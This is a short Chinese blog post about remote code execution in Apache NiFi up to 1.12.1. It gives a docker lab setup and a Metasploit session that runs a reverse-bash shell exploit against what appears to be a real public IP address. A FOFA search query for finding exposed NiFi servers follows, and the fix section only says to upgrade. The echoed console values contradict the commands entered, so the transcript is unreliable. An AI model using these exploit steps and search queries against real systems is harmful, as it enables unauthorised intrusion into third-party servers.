Apache NiFi远程代码执行-RCE
目录一. 漏洞简介二. 影响版本三. docker-compose进行漏洞环境搭建四. 漏洞复现五. 漏洞挖掘六. 漏洞修复一. 漏洞简介Apache NiFi 是一个易于使用、功能强大而且可靠的数据处理和分发系统。Apache NiFi 是为数据流设计。它支持高度可配置的指示图的数据路由、转换和系统中介逻辑。二. 影响版本Apache NiFi <= 1.12.1三. docker-com
·
目录
一. 漏洞简介
Apache NiFi 是一个易于使用、功能强大而且可靠的数据处理和分发系统。Apache NiFi 是为数据流设计。它支持高度可配置的指示图的数据路由、转换和系统中介逻辑。
二. 影响版本
Apache NiFi <= 1.12.1
三. docker-compose进行漏洞环境搭建
测试环境版本:nifi:1.12.0
docker-compose.yml文件内容如下
version: '2'
services:
struts2:
image: apache/nifi:1.12.0
ports:
- "8080:8080"
- "8000:8000"
- "10000:10000"
执行docker-compose up -d 启动环境
访问8080,如下环境搭建成功
四. 漏洞复现
我这里是复现不了
2. 使用msf进行攻击
msf6 > use exploit/multi/http/apache_nifi_processor_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.60.7
lhost => 0.0.0.0
msf6 exploit(multi/http/apache_nifi_processor_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/apache_nifi_processor_rce) > set rhosts 目标ip
rhosts => 74.208.80.242
msf6 exploit(multi/http/apache_nifi_processor_rce) > set rport 目标端口
rport => 9090
msf6 exploit(multi/http/apache_nifi_processor_rce) > run
执行run,开始攻击,获取shell。
五. 漏洞挖掘
fofa:"nifi" && title=="NiFi"
六. 漏洞修复
升级到最新版
更多推荐
已为社区贡献10条内容
所有评论(0)